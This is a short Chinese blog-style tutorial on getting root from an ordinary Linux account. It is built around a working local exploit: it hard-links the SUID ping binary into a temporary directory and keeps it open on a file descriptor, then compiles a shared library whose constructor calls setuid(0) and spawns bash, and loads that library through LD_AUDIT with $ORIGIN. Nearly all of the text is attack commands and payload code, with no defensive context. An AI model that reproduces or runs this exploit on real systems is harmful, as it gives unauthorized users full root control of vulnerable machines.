linux普通用户提权root

用普通用户boy作为测试对象
linux普通用户提权root_第1张图片

[boy@localhost ~]$ mkdir /tmp/exploit
[boy@localhost ~]$ ln /bin/ping /tmp/exploit/target #使用ping命令的suid特性创建一个链接
[boy@localhost ~]$  exec 3< /tmp/exploit/target #调用命令
[boy@localhost ~]$ ls -l /proc/$$/fd/3
lr-x------ 1 test test 64 Aug 17 21:41 /proc/35612/fd/3 -> /tmp/exploit/target
[boy@localhost ~]$ rm -rf /tmp/exploit/
[boy@localhost ~]$ ls -l /proc/$$/fd/3
[boy@localhost ~]$ vim payload.c 
void __attribute__((constructor)) init()     //在配置文件加入如下的内容
{
    setuid(0);
    system("/bin/bash");
}

linux普通用户提权root_第2张图片

[boy@localhost ~]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[boy@localhost ~]$ ls -l /tmp/exploit
[boy@localhost ~]$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3

linux普通用户提权root_第3张图片

你可能感兴趣的:(linux系统)